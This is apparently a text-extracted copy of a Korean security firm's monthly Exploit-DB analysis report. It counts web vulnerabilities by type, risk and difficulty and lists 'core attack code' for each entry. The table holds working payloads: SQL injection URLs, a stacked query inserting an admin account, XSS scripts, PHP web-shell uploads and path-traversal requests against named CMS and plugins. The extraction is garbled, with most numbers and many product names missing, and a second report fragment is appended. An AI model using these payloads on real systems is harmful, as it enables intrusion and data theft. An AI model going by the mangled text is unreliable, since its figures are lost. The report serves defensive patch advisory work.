EDB 분석보고서 (0.0) 0.0.0~0.0. Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 SQL Injection 중상 Absolu

Size: px

Start display at page:

Download "EDB 분석보고서 (0.0) 0.0.0~0.0. Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 SQL Injection 중상 Absolu"

주화 여
5 years ago
Views:

1 EDB 분석보고서 (0.0) 0.0.0~0.0. Exploit-DB( 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 0 년 월에공개된 Exploit-DB 의분석결과, 잘알려진웹공격인 SQL Injection 과 XSS(Cross Site Scripting) 공격에대한보고가가장많았습니다. 분석된 SQL Injection 공격과 XSS 공격은비교적낮은공격난이도가요구되는쉽게시도가능한공격이었던반면, 높은위험도를지니고있어공격성공시치명적인피해를입을수있는것으로확인되었습니다. 이는단순한공격패턴에도쉽게웹서버의정보가유출되거나관리자권한이탈취되어웹사이트가악용될수있음을의미하기때문에, 보안담당자는 SQL Injection 과 XSS 에대한공격대응에조금더주의를기울이는것이필요합니다. 금월에는특히다양한종류의 (Content Management System) 에서 XSS, SQL Injection 등이보고되었습니다. 를비롯한해당보고서에포함되어있는 정보를확인하여문제가되는 를사용하고있고해당을보유하고있다고판단된다면신속하게보안패치를수행하여각에대응하는것을권고드립니다.. 별보고개수 보고개수 XSS 8 SQL Injection 8 File Upload LFI 총합계 별보고개수 XSS SQL Injection File Upload LFI 총합계. 위험도별분류 위험도 보고개수 백분율 상 8 6.% 중.8% 하 % 합계 % 위험도별분류 8 상 중. 공격난이도별현황공격난이도 보고개수 백분율 상.6% 중 0.77% 하 % 총합계 % 공격난이도별현황 상 중 6 하. 주요소프트웨어별발생현황소프트웨어이름 Analyzer WordPress Shopping Cart PHP Webquest NPDS Revolution- Microweber Mangallam e ServiceDesk Plus ecommercemajor Barracuda Networks Cloud 총합계 보고개수 9 주요소프트웨어별발생현황 Analyzer WordPress Shopping Cart PHP Webquest NPDS Revolution- Microweber Mangallam ** 개이상발생한주요소프트웨어별상세 EDB 번호 종류 공격난이도 공격위험도 이름 소프트웨어이름 786 XSS 하 중.0. - credential 786 XSS 하 중.0. - inventories 786 XSS 하 중.0. - projects 786 XSS 하 중.0. - schedules 786 XSS 하 중.0. - permissions

2 EDB 분석보고서 (0.0) 0.0.0~0.0. Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 SQL Injection 중상 Absolut.7 - masection.php SQL Injection /admin/masection.php?&username=admin&session= c8d7ebc9b9ba7dbeb9bea6c7&sectionid=%7 +and+=+union+select+,version%8%9,,,, SQL Injection 중상 Absolut.7 - edituser.php SQL Injection /admin/edituser.php?username=admin&session=c8d7ebc9 b9ba7dbeb9bea6c7&userid=%7+and+=+ union+select+,user%8%9,,version%8%9,,datab ase%8%9,7,8, SQL Injection 하상 Absolut.7 - admin.php SQL Injection /admin/admin.php?username=admin%7+and+substring %8user%8%9,,%9=%7root%7+-- +&session=c8d7ebc9b9ba7dbeb9bea6c7* SQL Injection 중상 Absolut.7 - marelated.php SQL Injection /admin/marelated.php?username=user&session=ae 9000d8707c897e87d09b6&articleID=0&title={s ome_title}' and = union select,version(),,,,6,7,8,9,0,, XSS 하중.0 - add XSS POST /demo/games/add HTTP/. User-Agent: Mozilla/.0 (compatible; MSIE 0.0; Windows NT 6.; WOW6; Trident/6.0) dd009908f WebKitFormBoundaryhqOjdXjGMh7GyfIw Content-Disposition: form-data; name="val[content]" <script>document.body.innerhtml="your text here"</script><noscript> WebKitFormBoundaryhqOjdXjGMh7GyfIw XSS 하중 add XSS POST /adaptcms/admin/categories/add HTTP/. User-Agent: Mozilla/.0 (compatible; MSIE 0.0; Windows NT 6.; WOW6; Trident/6.0) dd009908f _method=post&data[_token][key]=8f8ee97800bb 06d7c69bcade60&data[Category][title]="><scr ipt>alert();</script>&data[_token][fields]=dece 076bf8f7e776fa7966:&data[_Token][unlocke d]= XSS 하중 - ajax_fields XSS POST /adaptcms/admin/fields/ajax_fields/ HTTP/. User-Agent: Mozilla/.0 (compatible; MSIE 0.0; Windows NT 6.; WOW6; Trident/6.0) dd009908f data[field][category_id]=&data[field][title]="><script>aler t();</script>&data[field][description]= POST /adaptcms/admin/tools/create_theme?finish=true HTTP/ XSS 하중 - create_theme XSS User-Agent: Mozilla/.0 (compatible; MSIE 0.0; Windows NT 6.; WOW6; Trident/6.0) Content-Type: application/x-www-form-urlencoded; {"basicinfo":{"name":"<script>alert();</script>"}} XSS 하중 new XSS POST /adaptcms/forums/off-topic/new HTTP/. User-Agent: Mozilla/.0 (compatible; MSIE 0.0; Windows NT 6.; WOW6; Trident/6.0) dd009908f _method=post&data[_token][key]=c87b6 77ae8dbca8a7f9dba&data[ForumTopic][subject]=" ><script>alert();</script>&data[forumtopic][content]=<p >testingcontent</p>&data[forumtopic][topic_type]=topic &data[forumtopic][forum_id]=&data[_token][fields]=bcf f0f6eb0d877fcdd8c9f69a:forumtopic. forum_id ForumTopic.topic_type&data[_Token][unlocked] = SQL Injection 중상 v main.php SQL Injection /backend/main.php?area=con_configcat&idcat=' and ''='' union select version(),user(),, -- &idtplconf=0 v..6.0

3 EDB 분석보고서 (0.0) 0.0.0~0.0. Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 SQL Injection 중상 v main.php SQL Injection /backend/main.php?area=plug&idclient=' and ''='' union select,version(),user(),,database(),6,7,8,9,0,,,, -- v SQL Injection 하상 Microweber category: SQL Injection /shop/category: sleep(0) Microweber Microweber File Upload 하중 WordPress Shopping Cart.0. - banneruploaderscript.php File Upload POST /wp-content/plugins/wpeasycart/inc/amfphp/administration/banneruploaderscript. php HTTP/. User-Agent: Mozilla/.0 (compatible; MSIE 0.0; Windows NT 6.; WOW6; Trident/6.0) dd009908f WordPress Shopping Cart WordPress Shopping Cart dd009908f Content-Disposition: form-data; name="filedata"; filename="shell.php" Content-Type: application/octet-stream <?php echo?> dd009908f XSS 하중. - index.php XSS /admin/index.php?jak_username="><script>alert()</script > XSS 하중. - dialog.php XSS /js/editor/plugins/filema/dialog.php?type="><script> alert()</script> SQL Injection 하상. - index.php SQL Injection /admin/index.php?p=logs&sp=delete&ssp= and = XSS 하중.0. - credential /api/v/credentials?order_by="><script>alert('xss')</script> XSS 하중.0. - inventories /api/v/inventories?order_by="><script>alert('xss')</script> XSS 하중.0. - projects /api/v/projects?order_by="><script>alert('xss')</script> XSS 하중.0. - schedules /api/v/schedules?next_run="><script>alert('xss')</script> XSS 하중.0. - permissions /api/v/users//permissions?order_by="><script>alert('xss') </script> SQL Injection 하상.0. - profile.functions.php SQL Injection POST /articlefr/register/ HTTP/. User-Agent: Mozilla/.0 (compatible; MSIE 0.0; Windows NT 6.; WOW6; Trident/6.0) dd009908f.0. username= and = & =test@itas.vn&name=test&password=&su bmit=register SQL Injection 중상 e ServiceDesk Plus CreateReportTable.jsp SQL Injection /reports/createreporttable.jsp?site=0 AND UNION ALL SELECT user(),null,null,null,null e ServiceDesk Plus e ServiceDesk Plus 9.0

4 EDB 분석보고서 (0.0) 0.0.0~0.0. Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 SQL Injection 중상 POST /sis-ui/authenticate Host : Accept:*/* AppFire-Format-Version :.0 AppFire-Charset: UTF-6LE Content-Type : application/x-appfire User-Agent : Java/.7.0_ Data-Format=text/plain Data-Type=properties Data-Length=000 ai=&ha=example.com&nun=aaaaaaaaaaaaaa'; INSERT INTO USR (RID, USERNAME,PWD, CONTACT_NAME, PHONES, , ALERT_ , ADDRESS, MANAGER_NAME, BUSINESS_INFO, PREF_LANGUAGE, FLAGS, DESCR, CREATETIME, MODTIME, ENABLED, BUILTIN, HIDDEN, SALT) VALUES (0, 'secconsult', 'DUjDkNZgv9ys9/Sj/FQwYmP9JBtGy6ZvuZnkAZxXc=', '', '', '', '', '', '', '', '', NULL, 'SV DESCRIPTION', ' ::09', ' ::', '', '0', '0', 'NDSNcDdDb89eCIURLriEOL/RwZXlRuWxyQpyGR/tfWt 8wIrhSOipth8Fd/KWdsGierOx809rICjqrhiNqPGYTFyZKuq snkchwxx+agauawctdii7zxjoqafdaobasud867 mmeuxia0cezj0gcanwvnoerhqwttto='); -- ''..9 미만버전 XSS 하중 - SSO-Error.jsp XSS %Fwebui%FKhaki_docs%FSSO- Error.jsp%FErrorMsg%D%Cscript%Ealert(%7xss% 7)%C%Fscript%E%0A..9 미만버전 XSS 하중 - WCUnsupportedClass.jsp XSS %Fwebui%Fadmin%FWCUnsupportedClass.jsp%Fcl assname%d%cscript%ealert(%7xss%7)%c%f script%e..9 미만버전 SQL Injection 중상.0.-alpha - admin.php SQL Injection /admin.php?type=site&action=update&p=+and+=+uni on+select+,version%8%9,, alpha XSS 하중.0.-alpha - admin.php XSS /admin.php?type=search&action=%cscript%ealert%8 document.cookie%9%c/script%e.0.-alpha SQL Injection 중상 - offerringads SQL Injection //classifieds/offerringads?controller=displayads&view=displayads&task=viewad& id=+and+=+union+select+,version%8%9,, XSS 하중 - classifieds XSS //classifieds?view=displayads7edb"onl oad%d"alert()"87dd&layout=offerring&controller=disp layads&adtype= LFI 하중 Analyzer index.do LFI /event/index.do?helpp=userreport&overview=true&tab= report&url=../../web-inf/web.xml%f Analyzer Analyzer XSS 하중 Analyzer index.do LFI /event/index.do?helpp=userreport&overview=true&tab= report&url=userreport'%()%6%<ahy><script%0 >prompt(97)</script> Analyzer Analyzer SQL Injection 하상 PHP Webquest.6 /phpwq/webquest/soporte_horizontal_w.php?id_actividad =8&id_pagina=%7%0and%0=-- PHP Webquest PHP Webquest XSS 하중 SQL Injection 중상 Barracuda Networks Cloud Series - / XSS Mangallam - news_view.php SQL Injection SQL Injection 중상 ecommercemajor /<iframe src=a>%0%0%0%0\"><iframe src= onload=alert("vl") < /news_view.php?newsid=- +and+=+union+select+,version%8%9,,+--+ /ecommercemajor/product.php?productbycat=+and+= +union+select+,version%8%9,,+--+ Barracuda Networks Cloud Mangallam ecommercem ajor Barracuda Networks Cloud Series Mangallam ecommercem ajor File Upload 하중.0. - videouploader.php File Upload POST /articlefr/dashboard/videouploader.php HTTP/. User-Agent: Mozilla/.0 (compatible; MSIE 0.0; Windows NT 6.; WOW6; Trident/6.0) dd009908f Content-Disposition: form-data; name="myvideo"; filename="img.php" Content-Type: image/gif.0. <?php phpinfo();?>

5 EDB 분석보고서 (0.0) 0.0.0~0.0. Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB번호 분류 공격난이도 공격위험도 이름 핵심공격코드 대상프로그램 대상환경 POST /npds/search.php HTTP/ SQL Injection 중 상 NPDS Revolution- - NPDS NPDS search.php SQL Injection User-Agent: Mozilla/.0 (compatible; MSIE 0.0; Windows Revolution- Revolution- NT 6.; WOW6; Trident/6.0) Content-Type: application/x-www-form-urlencoded query=")and benchmark( ,sha())- /vbsso/vbsso.php?a=act&do=avatar&id=' or user.userid = UNION ALL SELECT userfield.*, usertextfield.*, user.*, usergroup.genericpermissions, UNIX_TIMESTAMP(passworddate) AS passworddate, IF(displaygroupid=0, user.usergroupid, displaygroupid) AS displaygroupid, concat(user.password, 0xa, user.salt) AS avatarpath, NOT ISNULL(customavatar.userid) AS hascustomavatar, customavatar.dateline AS avatardateline, SQL Injection 상상.. - vbsso.php SQL Injection customavatar.width AS avwidth, customavatar.height AS avheight, customavatar.height_thumb AS avheight_thumb, customavatar.width_thumb AS avwidth_thumb, vbulletin vbsso Single Sign-On vbulletin vbsso Single Sign-On.. customavatar.filedata_thumb FROM user AS user LEFT JOIN userfield AS userfield ON (user.userid = userfield.userid) LEFT JOIN usergroup AS usergroup ON (usergroup.usergroupid = user.usergroupid) LEFT JOIN usertextfield AS usertextfield ON (usertextfield.userid = user.userid) LEFT JOIN avatar AS avatar ON (avatar.avatarid = user.avatarid) LEFT

EDB 분석보고서 (04.06) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. Directory Traversal users-x.php 4.0 -support-x.php 4.0 time-

EDB 분석보고서 (04.06) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. Directory Traversal users-x.php 4.0 -support-x.php 4.0 time- EDB 분석보고서 (04.06) 04.06.0~04.06.0 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 04년 06월에공개된 Exploit-DB의분석결과, SQL 공격에대한보고개수가가장많았습니다. 이와같은결과로부터여전히 SQL 이웹에서가장많이사용되는임을확인할수있습니다.